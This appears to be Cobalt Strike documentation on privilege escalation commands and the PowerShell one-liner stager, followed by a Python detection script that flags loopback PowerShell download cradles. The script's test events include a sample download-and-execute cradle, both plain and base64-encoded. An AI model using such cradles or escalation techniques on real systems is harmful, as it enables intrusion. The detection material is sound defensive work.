
Elevate with an Exploit

1) elevate

  • This command lists privilege escalation exploits registered with Cobalt Strike.

2) elevate [EXPLOIT] [LISTENER]

  • This command attempts to elevate with a specific exploit.

You may also launch one of these exploits through [beacon] -> Access -> Elevate.

Choose a listener, select an exploit, and press Launch to run the exploit. This dialog is a front-end for Beacon's elevate command.

You may add privilege escalation exploits to Cobalt Strike through the Elevate Kit. The Elevate Kit is an Aggressor Script that integrates several open source privilege escalation exploits into Cobalt Strike. https://github.com/rsmudge/ElevateKit.

3) runasadmin

  • By itself, this command lists command elevator exploits registered with Cobalt Strike.

4) runasadmin [EXPLOIT] [COMMAND + ARGS]

  • This command attempts to run the specified command in an elevated context.

Cobalt Strike separates command elevator exploits and session-yielding exploits because some attacks are a natural opportunity to spawn a session. Other attacks yield a “run this command” primitive. Spawning a session from a “run this command” primitive puts a lot of weaponization decisions (not always favorable) in the hands of your tool developer. With runasadmin, it’s your choice to drop an executable to disk and run it, to run a PowerShell one-liner, or to weaken the target in some way.

If you’d like to use a PowerShell one-liner to spawn a session, go to [beacon] -> Access -> Oneliner.

This dialog sets up a localhost-only webserver within your Beacon session to host a payload stage and returns a PowerShell command to download and run this payload stage.

This webserver is one-use only. Once it has been connected to once, it cleans itself up and stops serving your payload.
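From the defender's side, the one-liner described above shows up in process-creation logs as PowerShell downloading from a loopback URL. The following detection sketch is an added example, not Cobalt Strike code or output. The exact command Cobalt Strike generates is not shown on this page, so the sample command lines, the list of download primitives, and the event field names `image` and `cmdline` are assumptions.

```python
import base64
import re

# Loopback URL in a command line: 127.0.0.0/8, localhost or [::1], optional port.
LOOPBACK_URL = re.compile(r"https?://(?:127(?:\.\d{1,3}){3}|localhost|\[::1\])(?::\d+)?/", re.I)
# PowerShell download primitives (assumed starter list; extend for your environment).
DOWNLOAD = re.compile(r"download(?:string|data|file)|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", re.I)
# A "-flag value" pair whose value looks like base64.
FLAG_ARG = re.compile(r"\s-(\w+)\s+([A-Za-z0-9+/=]{8,})")

def decoded_commands(cmdline):
    """Decode -EncodedCommand arguments (any accepted abbreviation, or -ec)."""
    out = []
    for flag, blob in FLAG_ARG.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                out.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
            except ValueError:  # bad base64 or not UTF-16LE text: ignore
                pass
    return out

def flag_loopback_stager(event):
    """Return a reason string for a PowerShell loopback download, else None."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    views = [("plain", event["cmdline"])]
    views += [("encoded", text) for text in decoded_commands(event["cmdline"])]
    for kind, text in views:
        url = LOOPBACK_URL.search(text)
        if url and DOWNLOAD.search(text):
            return f"{kind}: download from {url.group(0)}"
    return None

# Constructed process-creation events (not captured from a real host).
CRADLE = "IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/'))"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"image": PS, "cmdline": f'powershell.exe -nop -c "{CRADLE}"'},
    {"image": PS, "cmdline": "powershell.exe -nop -enc "
        + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"image": PS, "cmdline": 'powershell.exe -c "Invoke-WebRequest https://example.com/update.json"'},
    {"image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe http://localhost:3000/health"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(flag_loopback_stager(e), "|", e["cmdline"][:60])
```

Developers testing local services from PowerShell will also match, so pair this with context such as parent process and integrity level before alerting.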

Cobalt Strike does not have many built-in elevate options. It is easy to integrate privilege escalation exploits via Cobalt Strike’s Aggressor Script programming language though. To see what this looks like, download the Elevate Kit (https://github.com/cobalt-strike/ElevateKit). The Elevate Kit is an Aggressor Script that integrates several open source privilege escalation exploits into Cobalt Strike.
